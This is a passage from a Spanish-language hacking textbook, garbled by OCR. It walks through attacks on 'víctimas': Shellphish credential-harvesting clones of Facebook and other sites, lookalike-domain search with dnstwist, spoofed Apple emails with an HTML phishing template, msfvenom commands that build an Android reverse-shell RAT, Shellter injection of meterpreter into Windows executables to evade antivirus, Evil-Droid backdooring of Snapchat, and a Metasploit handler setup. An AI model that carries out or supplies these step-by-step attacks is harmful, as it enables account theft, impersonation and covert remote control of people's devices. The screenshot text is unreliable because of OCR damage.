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siendo accesible globalmente, sin importar si estas corriendo la herramienta en 
tu maquina virtual local o no, aun asi, para algunas otras acciones es mas estable 
SEToolkit(pero podrias tomar los modelos de Shellphish y utilizarlos en SEToolkit), 


asi que vale la pena conocer ambos. 


Para iniciar shellphish en nuestro Kali, nos vamos a la carpeta /opt/ 
Explotacion/shellphish. Y ejecutamos el script escribiendo ./shellphish.sh, nota que 
debemos darle permisos de ejecución con chmod +x shellphish.sh si no lo has hecho. 


:: Disclaimer: Developers assume no Liability and are not = 
:: responsible for any misuse or damage caused by SheilPhish :: 


Instagram 
Facebook 
Snapchat 
Twitter 
Github 
Google 
Spotify 
Netflix 


Basta con escribir el número de la opción que desees, por ejemplo, en este 
caso si quieres Facebook sería la opción 2, para que se inicie el proceso, al iniciarse, 


Origin ¿173 Gitlab 


} Steam £18} Custom 
i Yahoo 

} Linkedin 

} Protonmail 

| Wordpress 

} Microsoft 

i InstaFollowers 





te dará una liga de ngrok, que funciona globalmente. 


: https: //9fe39442 .ngrok.io 
im open the Link ... 
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Si tu víctima ingresa a la liga, se verá algo así desde su punto de vista, nota 
que el diseño es idéntico a las páginas verdaderas, y que incluso tienen un certificado 
SSL, sin embargo, la URL sigue mostrándose sospechosa. 


Sub ar Poe 


facebook 


Facebook helps you connect and share with the Create an accou nt 
people in your life. it's free and always vell be. 


A 


Birthday 
24 vi Me, rs 


Female Hale 


Create a Pago for a colelaceg band se buskon 





De tu punto de vista aparecerá algo similar a esto, en donde te mostrará la IP, 
navegador, sistema y ubicación aproximada de la víctima. 


ctin IP: 189. 
gent: User-Agent: Hozilla/5.@ (Windows NT 16.8; Win64; x64) ApplewebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safar 


: facebook/saved.ip.txt 


dsi- -dyn.prod- 
-in-addr.arpa 
: North America (NA) 
xico 


Uninet S.A. de C.V. 
i: Broadband (Cabie/DSt) Internet Speed 
eso {MXM} 





Y una vez que la víctima ingrese sus credenciales, a ti te aparecerán en tu 
terminal, redirigiendo a tu víctima a la página real para no levantar sospechas. 


UsuarioGfacebook.com 


contrasena 
sites/facebook/saved.usernames.txt 
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Ahora, este método tiene algunas fallas obvias, pero con soluciones sencillas. 


1. Solo captura credenciales de un usuario a la vez (tienes que correrlo 
de nuevo para capturar de otro una vez que el primero ingrese sus 
credenciales), esto se soluciona facilmente si exportas la lista de sitios 
a otra herramienta como SEToolkit, o si las corres en un servidor en tu 
sistema en la nube con una IP publica. 


2. La URL, aunque publica, sigue siendo muy sospechosa, de nuevo, la 
solución es asignar un dominio a tu IP pública. 


4.2.3 Dominios maliciosos 


He mencionado varias veces que conviene que compres un dominio creíble 
y lo utilices para tus ataques de Phishing, sin embargo, sería muy tedioso buscar un 
dominio para tu ataque que esté disponible a prueba y error. Afortunadamente, no 
tenemos que hacerlo, podemos utilizar simplemente un script en Python para que 
nos muestre cada dominio que se parezca al original que intentamos atacar, y si está 
o no utilizado. 


Para esto, nos iremos al directorio en nuestro sistema de dnstwist escribiendo 
cd /opt/Reconocimiento/dnstwist, y ejecutaremos el script seguido del dominio que 
queremos encontrar uno similar, por ejemplo, de Facebook sería algo así: 


./dnstwist.py facebook.com. 


:/# cd fopt/Reconocimiento/dnstwist/ 


# ls 


Dockerfite README. md 
# ./dnstwist.py facebook.com 





Seguido de esto, empezará a buscar todas las alternativas, y si están siendo 
utilizadas. 





Luego de unos segundos, podrás ver todas las alternativas, si tienen un 
registro a la derecha, significa que alguien está utilizando ese dominio, si no, podría 
estar disponible. 
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facebo.ok.com - 

faceboo.k.com - 

afcebook.com 103.224.182.245 ES: EX: 
fcaebook.com 31.13 .1 2403:2880:f00d:1:face:b00c:0:1 NS 
faecbook.com 103.224.182.245 ES Xx 
facbeook. com 103.224.182.245 


facecbok.com 31.13.76.1 2203:2880:f00d:1:face:b00c:0:1 NS: 
faceboko.com 185.53.179.29 HS 

facibook. com 185 .53.178.22 NS: 

facobook.com 199.191.50.73 ES 

faceboek.com 199.59.242.151 





4.2.3.1 INSTALACIÓN 


Si te falla al correrlo, probablemente te falto algún paso en la instalación 
(luego de haberlo descargado y estar en su dirección en la terminal) requieres primero 
darle permisos al script con el comando chmod +x dnstwist.py, y luego escribir pip 
install -r requirements.txt. 


Linux 


Ubuntu Linux is the primary development platform. if running Ubuntu 15.04 or newer, you can install dependencies like this: 


$ sudo apt-get install python-dnspython python-geoip python-whois \ 
python-requests python-ssdeep python-cffi 


Alternately, you can use Python tooling. This can be done within a virtual environment to avoid conflicts with other 
installations. However, you will still need a couple of libraries installed at the system level. 


$ sudo apt-get install libgeoip-dev libffi-dev 
$ BUILD LI8=1 pip install -r requirements.txt 


4.2.4 Email Spoofing 


Ahora que ya sabes cómo crear páginas web falsas para robar credenciales 
por medio de phishing, sigue pensar en una forma de convencer a la víctima de que 
abra esa página. 


Existen muchas formas en las que se podría hacer esto, como ingeniería 
social por redes sociales, pero uno de los métodos más efectivos hasta hoy, es utilizar 
el correo electrónico, sin embargo, si envías un correo de facebookcuen45@gmail. 
com, probablemente o te marcarán como “spam”, o simplemente no te creerán, 
especialmente en ambientes corporativos. 


Lo que sugiero, es hacer lo que llamamos “email spoofing”, que es mandar 
un correo con el dominio de la víctima de forma que se crea que es el mismo correo. 
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Para hacer esto, no necesitamos una herramienta dentro de Linux 
necesariamente, basta con utilizar alguna pagina web, puedes encontrar una 
herramienta desarrollada por nosotros en whitesuithacking.com/material-libro en 
el botón “email spoof”, pero hay varias otras alternativas también. 


EMAILSPOOF 


Luego de entrar, notaras algunos campos, en estos pones la dirección desde 
donde quieres que llegue el correo electrónico, a quien se le mandara, y el contenido. 
Digamos que nuestra víctima es usuario@gmail.com, y queremos mandarle un 
correo de Apple, digamos, de pablo@apple.com , escribiríamos algo similar a esto. 


Email Fako: 
Email de la víctima: E 
E i. 


pruebaapplel 
Contenido del correo: 





Así, a la víctima le llegaría algo como esto: 


pruebaapple 


O pabio <pablo@apple.com> X 


to: gmail.com> 


pruebaapple 


Y o 
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Sin embargo, cabe hacer notar que en el apartado de “contenido del correo” 
se acepta código HTML, asi que vamos a llevarlo un paso más lejos. 


Para agregar modelos HTML para hacer el correo parecer legítimo, basta 
con pegar el código HTML en dicho apartado, por ejemplo, en la carpeta /opt/ 
Explotacion/email templates agregue algunos modelos para que experimenten con 
este ataque. 


zF à # 


En este caso, agregare un template de Apple para hacer creer a la víctima 
que el correo viene de Apple, y que tiene que reestablecer su cuenta, el modelo se ve 
algo como esto, recuerda que es HTML, las ligas y los nombres adecuados deberás 
cambiarlos para que dirijan a tu víctima a una liga maliciosa en tu poder. 


Dear Pabio Gutierrez, 


Your Apple ID (; - ‘@gmail.com) was used to sign in to ¡Cloud via a web browser. 


Date and Time: 24 April 2018, 9:08 AM PDT 
Browser: Chrome 
Operating System: Windows 


if the information above looks familiar, you can disregard this email. 

E you have not signed in to iCloud recently and believe someone may have accessed your 
account, go to Apple ID (https #/appleid apple.com) and change your password as soon as 
possibie. 


Sincerely, 


Apple Support 


Appie R i Support i 
32013 Appie inc. One Apple Park Way. ¢ § 95014 USA Al righis reserved. 





Lo mandaríamos pegando el código modificado en la página para mandar 
correos. 
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Email Falso: 
Email de la victima: ESTO Pa 
E 


<table class="m_1223344743394638175mainTable" align="center" style="margin: 
auto; font-size: inherit; line-height: inherit; text-align: center; border- 
spacing:8;border-collapse:collapse;padding:0;border:@" cellpadding="0" 
cellispacing="0"> 

<thody><tr><td class="m_1223344743394638175topPadding™ 
style="font-family: ‘Lucida Grande’ ,Helvetica,Arial, sans-serif; height: 16px" 
height="16"></td></tr> 

<tr> 

Contenido del corre: <td class="m_1223344743394638175centerColumn" 





Y finalmente, a la víctima le llegaría algo similar a lo siguiente, este solo es 
un ejemplo, en realidad podrías utilizar esta metodología para meter en las ligas de 
los correos ligas a descargas maliciosas, phishing, o incluso para engañar personas 
en una organización para que te den información sensible. 


<pablo@epple com> 2 


G@omai.conr < 


Dear Pablo Gutierrez, 

Your Apple ID (: gmail.com} was usec lo sign in to ¡Cloud via a web browser. 
Date and Time: 24 Apri 2018, 9:08 AM PDT 

Browser Chrome 

Operating System: Windows 

H the information above icoks familiar. you can disregard this emaii 

H you have nol signed is to iCioud recently and believe someone may have accessed your 

account, go ic Apple iD (hltps://appieid.appie.com)} and change your password as soon as 

possible. 


Sincerely, 


Apple Suppest 


Copyright S 2048 Appie inc. 0 Wa VSA Aa rights reserved 


<pablo@apple com> 2 


@gmailcom” < Gmail com> 
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4.2.4.1 ¿COMO FUNCIONA ESTE ATAQUE? 


Es muy sencillo, un correo electrónico no es muy diferente a correspondencia 
física, tiene “estampillas” de la misma forma, solo que en este caso es metadata, con 
modificar esta metadata, podemos hacer parecer como que el correo vino de otro lugar. 


Por la forma en la que funciona, es solo de ida el correo, es decir, si alguien 
responde a pablo@apple.com, no recibiría esa respuesta. 


Adicionalmente, por la forma en la que funciona, sistemas básicos de 
detección de SPAM podrían detener el ataque, sin embargo, muchas organizaciones, 
particularmente las PyMES, no utilizan ningún sistema de seguridad en correos 
electrónicos, por lo cual sigue siendo una manera de ataque bastante efectiva. 


Si existen filtros, una alternativa es crear un correo electrónico con un 
dominio similar comprado. 


4.2.4.2 ¿A QUIEN LE MANDAMOS UN CORREO COMO ESTE? 


En la etapa de reconocimiento una de las principales metas es conseguir 
correos electrónicos, esta es la razón, podríamos utilizar esta metodología para robo 
de identidad entre compañeros de trabajo, de forma que uno de ellos abra algún 
archivo o liga malicioso/a. 


4.3 METASPLOIT 


Metasploit es una de las grandes herramientas del pentesting, es de las más 
útiles y utilizadas en el área. Es desarrollada y mantenida por Rapid7, y está escrita 
en Ruby, esta herramienta nos sirve para realizar la explotación y post explotación 
a casi cualquier sistema, por ejemplo, con esta herramienta podríamos entrar a un 
sistema vulnerable a Eternalblue, o podríamos crear un malware para Android y 
obtener acceso remoto al dispositivo al ser abierto por la víctima, en pocas palabras, 
esta es una de las herramientas que tienes que dominar si te interesa la ciberseguridad. 
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4.3.1 Estructura de la herramienta 


Antes de poder utilizarla, debes entender como está estructurada. Metasploit 
está compuesta de lo que llamamos módulos, y cada módulo tiene una función en 
particular, sus principales módulos son: 


Y Exploit 


Este módulo es utilizado para explotación de vulnerabilidades (CVEs, 
generalmente), lo utilizaras cuando detectes una vulnerabilidad en un 
sistema. 


Y Post 


Este módulo se refiere a post-explotación, tiene funciones para realizar 
tareas en dispositivos a los que ya tienes control. Unicamente te sirve si 
ya tienes acceso a un sistema, no antes. 


Y Payload 


Este módulo te sirve para crear payloads, que, en este contexto, es 
código malicioso con alguna función, típicamente acceso remoto, con 
este módulo podrías crear un troyano para acceder remotamente a un 
Android, Windows, o incluso servidores usando lenguajes como PHP, 
Ruby, Python, etc. 


Y Auxiliary 


Este módulo es utilizado para una variedad de ataques, desde DDOS, 
hasta reconocimiento o análisis de vulnerabilidades. 


Y Encoder 


Finalmente, el módulo encoder se utiliza para codificar los payloads para 
evadir antivirus, anteriormente era útil, pero hoy en día este módulo es 
obsoleto, así que no lo utilizaremos. 


auxiliary encoders exploits payloads 
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Prácticamente siempre que utilices Metasploit estarás en, o requerirás uno 
de estos módulos, pon atención a que quieres hacer y para qué sirve cada módulo al 
utilizarlo. 


Dentro de los módulos existen lo que llamaremos seripts, que se refiere a la 
utilidad o función en sí de Metasploit que utilizaremos. 


4.3.2 Palabras reservadas 


Metasploit tiene lo que llamamos “palabras reservadas”, que nos sirven 
para una tarea en particular mientras que la herramienta este corriendo, ahora, 
estas palabras solo funcionan cuando Metasploit está corriendo, antes de iniciar la 
herramienta no funcionaran. 


Msfconsole 


Esta es la palabra que, si escribes en la terminal, iniciara Metasploit. 


Search 


Esta palabra reservada se utiliza para buscar scripts en módulos dentro de la 
herramienta, es muy útil hasta que te sepas todas las rutas de memoria, por ejemplo, 
si buscas los payloads disponibles para Android, podrías escribir search payload/ 
android/ y te mostraría las opciones que tienes. 


Use 


Esta palabra es la que utilizaras siempre antes de iniciar algún script, por 
ejemplo, digamos que requieres lanzar un script del módulo exploit con la ruta 
exploit/multi/handler, para utilizarlo en Metasploit, tendrías que escribir use 
exploit/multi/handler. 


Set 


Dentro de Metasploit muchos de los scripts tienen variables que necesitan 
ser configuradas, por ejemplo, si vas a lanzar un ataque, generalmente hablando 
Metasploit no sabe a qué IP vas a atacar, utilizaras la palabra set para configurar las 
variables. Por ejemplo, digamos que tienes que configurar la IP, y la variable de esta 
es LHOST, asumiendo que tu IP es 192.168.1.16, para configurar esto escribirías set 
LHOST 192.168.1.16. 
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Show options 


Antes de configurar las variables, debes saber cuáles son estas, para saber 
esto puedes escribir show options y te mostrara las variables y configuraciones 
posibles en un script. 


Help 


En casi todos lados de la herramienta, si escribes h o help te aparecerá un 
menú con ayuda o comandos disponibles. 


Exploit/run 


Estas palabras son las que utilizaras para ejecutar un script o algún comando, 
por ejemplo, si tienes configurado un ataque y ya está listo para lanzarse, el comando 
de lanzamiento seria exploit. 


4.3.3 Armitage 


Metasploit en si es una herramienta que corre en la terminal, sin embargo, 
tiene una modalidad con interfaz gráfica, que se llama Armitage. Armitage tiene 
exactamente las mismas funciones que Metasploit, sin embargo, tiene unas cuentas 
ventajas, la primera y más obvia es que siendo interfaz gráfica, es más fácil de 
usar para la mayoría de las personas, y la segunda muy importante, es que tiene 
integración con otras herramientas tales como nmap con lo que puedes realizar 
escaneos y análisis de vulnerabilidades en una sola consola. 


Sin embargo, existen algunas desventajas claves, la primera es que, al ser un 
ambiente gráfico, no siempre vas a tener acceso a este, y consume considerablemente 
más recursos que Metasploit, adicionalmente, en mi experiencia personal he 
encontrado algunos bugs, que si no sabes cómo funciona la herramienta para resolver 
estos, podría echarte a perder un proyecto fácilmente. 


Sin embargo, su facilidad de uso y ambiente grafico no dejan de ser muy 
útiles en muchas situaciones, así que es algo que recomiendo estudiar. 
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vorkspaces Help 











En esta sección crearas troyanos o RATs para diferentes tipos de sistemas, 
primero te explicare los fundamentos de cómo funciona un RAT, luego te ensenare 
a crear varios tipos de RATs, y finalmente, te ensenare a controlar el RAT con 
Metasploit, al terminar los ejemplos con Metasploit, veremos cómo crear RATs con 
otras herramientas. 


Un troyano para acceso remoto, también llamados RAT (Remote Access 
Troyan), es código malicioso disfrazado de alguna aplicación que la víctima abriría o 
instalaría, pero ejecuta silenciosamente su código malicioso, dándote acceso remoto 
al sistema. 


El fundamento de cómo funciona esto es bastante sencillo, está compuesto 
de dos partes: 


1. El RAT 


El RAT es el archivo malicioso que se espera que la víctima ejecute, 
piensa en ello como un “espía encubierto” intentándose infiltrar a una 
organización, necesita al momento de ser creado, dos cosas, una IP, que 
podemos llamarle la “nodriza” (a donde se comunica una vez ejecutado), 
y un puerto, que es al puerto donde se le va a estar escuchando, esta IP y 
este puerto, es la del atacante, no la de la víctima. Piénsalo de esta forma, 
un espía ruso se infiltra en el FBI encubierto, una vez establecido, debe de 
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comunicarse con Rusia por medio de cartas para recibir instrucciones, la 
carta debe de tener dos cosas, la dirección de KGB en Rusia, y el nombre 
de su jefe, esas dos cosas son el equivalente a la IP y el puerto. 


2. El escuchador, o manejador (handler) 


El escuchador, o handler, es el servicio en el sistema del atacante que va 
a recibir las conexiones, y contestar con comandos sobre qué debe hacer 
el RAT que está en el sistema externo, si este no está habilitado en el 
momento en el que se reciben las conexiones, el RAT no tendrá ordenes, 
y por lo tanto, no hará nada. 


Piensa en esto como el “jefe” del espía en el ejemplo anterior, el espía 
puede mandar una carta a la KGB y a su jefe, pero si el jefe está de 
vacaciones y no responde con instrucciones, el espía simplemente se 
quedara sin hacer nada. 


Así es como funcionan todos los RATs, si alguna vez vas a realizar un ataque 
por medio de RAT, tienes que preguntarte como y donde vas a configurar estas dos 
cosas. 


Otra cosa, naturalmente, tienes que tener acceso a una IP publica de forma 
que las “cartas” (en el caso real serian paquetes) puedan llegar a tu controlador. 


4.4.1 Metasploit 


Metasploit es una de las herramientas más utilizadas para explotar sistemas, 
así que aprenderemos primero como crear malware utilizando el módulo de payload 
de Metasploit, para luego aprender a controlar dicho malware y sistema. 


4.4.1.1 MSFVENOM 


Msfvenom es una de las herramientas dentro de Metasploit, esta te permite 
crear malware, esencialmente basándose en el módulo de payloads, puede crear RATs 
para casi toda tecnología que hay, ya que Metasploit tiene para todos los sistemas 
operativos y casi todos los lenguajes más comúnmente utilizados. 


Para utilizarlo, en la terminal debes de escribir el comando, para el cual la 
estructura es msfvenom -p <ruta del payload> LHOST=<tu IP> LPORT=<tu 
Puerto> > /ruta/nombredelarchivo.terminacion 


Por ejemplo, si quisiéramos crear un malware para Android, el comando 
sería el siguiente: 


msfvenom -p android/meterpreter/reverse tcp LHOST=192.168.1.67 
LPORT=443 > /root/Desktop/malware.apk 
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Luego de presionar enter, debería de aparecer algo similar a lo siguiente, y el 
archivo en la ruta donde lo guardaste. 


msfvenom -p android/meterpreter/reverse tcp LHOST=192.168.1.67 LPORT=443 > /root/Desktop/maiware.apk 
1 , choosing Msf: :Module: :Piatform: Android from the payload 
g arch: dalvik from the payload 


ied, outputting raw payload 





Ese es un malware para Android, y si alguien lo ejecuta, y tú tienes un 
handler escuchando, obtendrías acceso remoto a ese dispositivo, de la misma forma 
funciona para todas las plataformas. 


malware. 
apk 





4.4.1.1.1 Donde encontrar más payloads 


Sino sabes dónde encontrar algún payload o malware para alguna tecnología, 
basta con iniciar la herramienta Metasploit y usar la palabra reservada search para 
encontrar la ruta. 


Recuerda que en msfvenom no escribimos el módulo payload, solo lo 
que sigue, porque el parámetro -p ya está diciéndole eso a la herramienta (seria 
redundante y daría un error). 


4.4.1.2 EVASIÓN DE ANTIVIRUS (WINDOWS) 


A pesar de que msfvenom es bastante efectivo en general, los payloads 
que crea para Windows en particular son tan conocidos que cualquier antivirus, 
incluyendo Windows defender los detecta, entonces evitaremos utilizar msfvenom 
por sí solo, e incluso los encoders de Metasploit, ya que también son inefectivos hoy 
en día. 


Sin embargo, podemos utilizar otras herramientas para evadir los antivirus, 
existen varias opciones como TheFatRat, Veil Shellter, que pueden infectar archivos 
ejecutables en Windows con malware procesado de forma que es menos detectable 
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por antivirus, y manteniendo la funcionalidad original del ejecutable, para evitar 
sospechas. 


Para probar estos malwares, sugiero probarlos en el laboratorio que hiciste, 
como en una maquina Windows 7. 


4.4.1.2.1 Práctica 


Shellter es una de las herramientas más efectivas para crear ejecutables 
para Windows que evaden antivirus, para leer o descargar dicha herramienta, ve a 
https: //shellterproject.com, es un ejecutable para Windows, sin embargo, es portable 
a Linux utilizando Wine. 


Nota que este software, aunque en su versión gratis es decente, tiene algunas 
limitantes, entre ellas tamaño de ejecutable que podemos infectar, y nivel de evasión 
de antivirus, la versión de paga es mucho más poderosa, y bastante barata, pero solo 
está a la venta para empresas de seguridad e investigadores en seguridad informática. 


En nuestro caso, ya lo tenemos descargado en la máquina que descargaste en 
la página de WhiteSuit Hacking, así que, para ejecutar la herramienta, deberás ir a 
la dirección /usr/share/shellter, y una vez ahí, escribir wine shellter.exe, la primera 
vez que lo ejecutes se configurara dentro de Wine, solo espera unos segundos y se 
abrirá la herramienta. 


:/# cd /usr/share/shettter/ 





r# wine shellter.ex 


Una vez en dicha pantalla, tendrás que ir eligiendo opciones hasta que hayas 
creado el malware que buscas, en la primera pantalla te preguntara si quieres crear 
un malware de forma automática o manual, selecciona automática escribiendo la 
letra a y presionando enter, en todo momento tienes la opción de escribir la letra H, 
que se refiere a “help” o ayuda, y te dará una explicación de que hace cada opción. 


1616161 01 10 0160116 16 61 11661061 0611161 001001 

11 16 61 06 01 01 10 

0010011 1110001 11611 11 10 BE 011001 
11006 10 01 11 01 ore cH 

0010010 11 00 0011010 100111 000111 66 1100011 01 10 y 


www.ShellterProject.com Wine Mode 





Luego, te pedirá la ruta del ejecutable al que se le va a inyectar código 
malicioso, nota que esto solo funciona para ejecutables para Windows. En este caso 
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escribí la ruta del archivo WinRAR que descargue de la página oficial, ya que es al 
que voy a inyectarle código malicioso. 


PE Target: /var/ww/html/winrar.exel 


En el sistema que tu descargaste, yo ya te pre-descargue dos archivos 
ejecutables para que practiques, que están en la ruta /opt/Explotacion/Exes/ 


:/# cd /opt/Explotacion/Exes/ 


#15 





putty.exe w 


‘>S 


Luego de seleccionar el ejecutable, la herramienta hará un poco de 
procesamiento que tarda de 30 a 60 segundos generalmente hablando, al terminar el 
procesamiento, te preguntará si quieres que el archivo tenga habilitado o no “stealth 
mode” que significa si quieres o no que se mantenga la funcionalidad original del 
archivo al que estamos infectando, seleccionaremos que sí. 





Enable Stealth Mode? (Y/N/H): y 


Luego te preguntara si quieres utilizar un payload de la lista de payloads (que es la 
lista de payloads que usa msfvenom), o si quieres subir uno que tu hayas creado, 
seleccionaremos que queremos usar uno de la lista escribiendo L. 


Una vez que seleccionaste que quieres usar uno de la lista, deberas seleccionar 
cual, aunque todos funcionan, yo sugiero utilizar la opción 1 que es meterpreter_ 
reverse_tcp. 


A 


* Payloads * 


Meterpreter Reverse FCP  [stager] 
Meterpreter Reverse HTTP [stager] 
Meterpreter Reverse HTTPS [stager] 
Meterpreter Bind TCP [stager] 
[stager] 
[stager] 


Shell Reverse TCP 
Shell Bind TCP 
WinExec 


Use a listed payload or custom? (L/C/H): 1 





Select payload by index: 1 


174 ELLIBRO BLANCO DEL HACKER. 2° EDICIÓN ACTUALIZADA © RA-MA 


Ahora, ¿recuerdas lo que había mencionado que al crear un malware se 
necesitan dos cosas? vamos a darle la información de estas dos cosas, la IP y el Puerto 
hacia dónde va a intentar conectarse al ejecutarse, recuerda que, si estás haciendo el 
ataque fuera de una red local, deberás usar aquí tu IP pública. 


El puerto no necesariamente tiene que ser el 443 como yo lo puse, puede ser 
cualquier puerto que no esté siendo utilizado por otro servicio. 


SET LHOST: 192.168.1.67 





SET LPORT: 443 


Al presionar enter, empezara a procesar, hasta que te de la pantalla final 
donde al presionar enter, ya habras terminado de generar tu archivo infectado. 


No se genera un nuevo archivo con esta herramienta, el archivo que tu 
seleccionaste al usar la herramienta se infectó con código malicioso. 


Injection: Verified! 





Press [Enter] to continue... 


De aqui solo queda que tu víctima abra el ejecutable y tu obtendrás acceso 
remoto a su sistema, notaras que el archivo generado se ve y funciona igual que el 
archivo original. 





4.4.1.3 INFECTANDO APLICACIONES ANDROID CON MALWARE 


Android es el sistema operativo de dispositivos móviles más utilizado en el 
mundo, y, debido a lo mucho que las personas utilizan y guardan información en el 
móvil hoy en día, es uno de los sistemas donde más información podríamos obtener 
de poderlo explotar. 
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Esta práctica sugiero realizarla en el emulador de Android Nox. 


De nuevo, podríamos crear un malware de Android con msfvenom, sin 
embargo, vamos a llevarlo un paso más elevado al infectar una aplicación existente 
con nuestro malware, haciéndolo mucho más difícil de detectar. 


Vamos a utilizar una herramienta llamada evildroid, que en nuestro sistema 
se encuentra en la carpeta /opt/Explotacion/Evildroid, así que vamos a esa carpeta, 
y buscaremos el script “evil-droid”, si no tiene permiso de ejecución, se lo daremos 
con el comando chmod +x evil-droid. 


:/# cd /opt/Explotacion/evildroid/ 


: Exi # ls 
changelog K i s README.md 
: /ept/Explotacio: roid# chmod +x evil-droid | 





Ahora ejecutaremos el archivo escribiendo./evil-droid e instalaremos 
todas las dependencias que nos solicite e iniciaremos los servicios de Metasploit 
presionando yes en las ventanas emergentes. 


@ Evil-Droid Framework $ Qi 


Execute framework and Services? 


EE 
Í i 











Al iniciarse la herramienta, tendrás un ment de opciones. 
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Esta herramienta hace su trabajo basandose en el payload para Android de 
Metasploit, y tienes unas cuantas opciones dependiendo de lo que busques hacer. 


ll. 


APK MSF 


Esta opción crea un malware para Android, igual que msfvenom, 
realmente no hace nada mas, no lo recomiendo mas que para pruebas y 
practica de nivel basico. 


. Backdoor APK Original (OLD) 


Esta opción infecta a una aplicación con código malicioso que te dará 
acceso remoto al dispositivo. Sin embargo, usa un método de infección 
más adecuado para aplicaciones que fueron creadas hace varios años y que 
no han sido actualizadas mucho, por ejemplo, videojuegos o aplicaciones 
de herramientas podrían ser infectadas por este método. 


. Backdoor APK Original (NEW) 


Esta opción infecta a una aplicación con código malicioso que te dará 
acceso remoto al dispositivo. Esta utiliza un método más adecuado para 
aplicaciones más modernas, como por ejemplo Snapchat. 


. Bypass AV APK (ICON CHANGE) 


No todas las aplicaciones pueden ser infectadas, así que una alternativa es 
cambiar el icono y evadir el sistema antivirus, por ejemplo, si vas a pasar 
un “WhatsApp Gold” con malware, y no puedes infectar el WhatsApp 
original, puedes simplemente cambiarle el icono al malware que creaste 
con msfvenom. 


. Start Listener 


Empezar el escuchador, esta opción inicia el manejador para escuchar 
conexiones del malware. 


Cada opción es útil en diferentes situaciones, sin embargo, para este ejemplo, 
vamos a inyectar a una aplicación decentemente moderna, Snapchat, para esto, 
seleccionaremos la opción 3. 
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Al escribir 3 y presionar enter, nos pedirá los dos requisitos para crear 
malware, IP y Puerto, en forma de LHOST y LPORT, de nuevo, recuerda que, si 
harás ataques globales, usa tu IP pública. 


Nombra tu archivo como gustes, recuerda que tu víctima vera este nombre. 


| 192.168.167 





Selecciona el Payload de Metasploit que utilizaras, en este caso yo sugiero 
android/meterpreter/reverse_tep, pero aun así funcionan los demás. 


e Option 
android/shetl/reverse_tcp 
android/shelUreverse_http 
android/shell/reverse_https 
android/meterpreter/reverse_tcp 
android/meterpreter/reverse_http 
android/meterpreter/reverse_https 
android/meterpreter_reverse_tcp 


android/meterpreter_reverse_http 


android/meterpreter_reverse_https 











Y finalmente selecciona la aplicación a la que vas a inyectar, en el sistema 
que descargaste ya pre-descargue algunas aplicaciones (no todas funcionan con 
este método), entre ellas, Snapchat, que si funciona, sin embargo, puedes descargar 
cualquier otra de apkpure.com u alguna otra fuente e intentarlo. 
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«< [El opt Explotacion  evildroid — apks 





Name 
: fb.apk 
: gboard.apk 
z netflix.apk 
note.apk 
snapchat.apk 
: snapchatviejo.apk 





: whatsapp.apk 


La primera vez que lo inicies te pedirá un cuestionario, simplemente presiona 
enter en todo, hasta al final que te pregunte que si ya terminaste, luego empezará a 
procesar: inyectando la aplicación. 


[*] Generating apk payload 
[*] Removing 1.apk framework file... 


[*] Decompiling Original APK... 





Cuando termine, te mostrará un mensaje de terminado, junto con la ubicación 
y nombre donde se guardó la aplicación infectada. 


®© EVIL-DROID @ o; 


BACKDOORED APK : /opt/Explotacion/evildroid/evilapk/ 
Libro.apk 


e 





| ox g 


De ahi basta con ingresar a esa ruta, y convencer a la victima que instale 
dicha aplicación en su dispositivo, también te aparecerá una ventana preguntándote 
si quieres que te autoejecute el escuchador, si la máquina en donde creaste el archivo 
malicioso es el mismo que tiene la IP donde vas a controlar al sistema de la víctima, 
esto te ahorraría algunos minutos de configuración al seleccionar “multi-Handler” 
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2 EVIL-DROID OPTIONS 


| Choose Option 


Multi-Handler 
Attack-Vector 
Main-Menu 
Exit 








4.4.1.3.1 ¿Cómo funciona? 


La teoría de cómo funciona este script es muy sencillo, esencialmente, agarra 
dos aplicaciones, la buena, que tu seleccionaste, y crea una “mala”, que es el payload 
de Metasploit, descompila ambas, y lo que quedan son objetos llamados “smali”, 
manifest, que es donde se piden los permisos, y el objeto/método principal, todo 
dividido en carpetas, entonces el script agarra el objeto de la aplicación “mala” y la 
pega en la carpeta de la “buena”, modifica el código del objeto/método principal para 
que mande llamar al objeto “malo”, y modifica el manifest para pedir más permisos, 
una vez terminado eso, compila la aplicación (la buena ahora infectada con el método 
“malo”, y la firma, y listo, ahí tienes una aplicación con funcionalidad original, pero 
con una funcionalidad oculta que te da acceso remoto al sistema de la víctima. 


4.4.1.4 CONTROLANDO AL SISTEMA REMOTAMENTE 


Ahora que ya creaste un programa malicioso que te dará acceso remoto (un 
RAT) al sistema que lo ejecute, debes cumplir con el segundo requisito de un RAT, 
que es un manejador, también conocido como handler, para hacer esto, abriremos 
Metasploit. 


Para abrir Metasploit, escribe msfconsole en la terminal. 


: # msfconsole 


180 ELLIBRO BLANCO DEL HACKER. 2° EDICIÓN ACTUALIZADA © RA-MA 


Una vez abierto, estaras en lo que se conoce como la consola de Metasploit, 
siempre que tengas en la terminal msf > puedes asumir que estas en esta consola, si 
tienes algo después del msf, sigues en la consola, sin embargo, probablemente estas 
dentro de uno de los módulos. 


1795 exploits - 1019 auxiliary - 310 post ] 
538 payloads - 41 encoders - 10 nops J 
Free Metasploit Pro trial: http://r-7.co/trymsp ] 





Dentro de aqui es donde te sirven las palabras reservadas de Metasploit, en 
este momento ya creamos malwares, entonces nos interesa tener un escuchador o 
handler, así que utilizaremos el comando use exploit/multi/handler para abrir el 
handler, nota la palabra reservada “use” y como cambia el módulo en la consola. 





> use exploit/multi/handler 
exploit ( ) > 





Ahora, un handler tiene varias variables, la primera y más importante, es 
“¿qué voy a controlar?”, y esto se refiere a que PAYLOAD va a manejar, así que 
vamos a darle el comando set PAYLOAD <payload>, en este caso, si estamos 
controlando Windows, el payload fue /windows/meterpreter/reverse_tcp, así que el 
comando seria set PAYLOAD windows/meterpreter/reverse tcp, asimismo, si 
fuéramos a controlar Android, seria set PAYLOAD android/meterpreter/reverse_ 
tcp, cualquiera sea el caso, escribes el payload que hayas utilizado para crear tu 
archivo malicioso. 


nsf expioitf ) > set PAYLOAD windows/meterpreter/reverse tcp 





PAYLOAD => windows/meterpreter/reverse tcp 


Luego, tienes que configurar las siguientes variables, para saber cuáles 
son, basta con escribir la(s) palabra(s) reservadas show options. Aqui, veras en 
mayúsculas las variables que tienes que darle a este handler, y si es requerido o no, 
en este caso es obvio, ya que vas a controlar un RAT, necesitas las dos cosas que 
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siempre necesita un RAT, que son la IP (LHOST) y el Puerto (LPORT), nota que 
siempre que sea LPORT o LHOST significa que es la IP del atacante, cuando sea 
RPORT o RHOST es la IP de la víctima. 


msf exploití ) > show opticns 


Module options (exploit/multi/handler): 


